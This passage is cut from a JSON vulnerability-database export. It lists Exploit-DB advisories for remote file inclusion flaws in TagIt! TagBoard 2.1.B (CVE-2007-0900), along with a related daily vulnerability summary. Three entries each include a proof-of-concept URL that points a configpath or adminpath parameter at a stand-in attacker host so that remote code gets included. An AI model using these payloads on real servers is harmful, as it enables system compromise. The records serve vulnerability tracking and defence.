"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29588/"}, {"lastseen": "2016-02-03T10:38:41", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/ban_watch.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! 
Tagit2b 2.1.B Build 2 tagmin/ban_watch.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29582", "href": "https://www.exploit-db.com/exploits/29582/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/ban_watch.phpp?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29582/"}, {"lastseen": "2016-02-03T10:39:05", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/editTagmin.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/editTagmin.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29585", "href": "https://www.exploit-db.com/exploits/29585/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. 
\r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/editTagmin.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29585/"}, {"lastseen": "2016-02-03T10:39:43", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/index.php adminpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/index.php adminpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29589", "href": "https://www.exploit-db.com/exploits/29589/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. 
\r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/index.php?adminpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29589/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-0928", "CVE-2007-0953", "CVE-2007-0983", "CVE-2007-1016", "CVE-2007-1021", "CVE-2006-7000", "CVE-2006-7005", "CVE-2007-0952", "CVE-2007-0954", "CVE-2006-7012", "CVE-2006-7004", "CVE-2007-1010", "CVE-2006-5249", "CVE-2006-7024", "CVE-2006-6998", "CVE-2007-0930", "CVE-2007-0984", "CVE-2006-6999", "CVE-2007-0900", "CVE-2007-0985", "CVE-2007-1012", "CVE-2007-1015"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2007-02-15T00:00:00", "published": "2007-02-15T00:00:00", "id": "SECURITYVULNS:VULN:7245", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7245", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}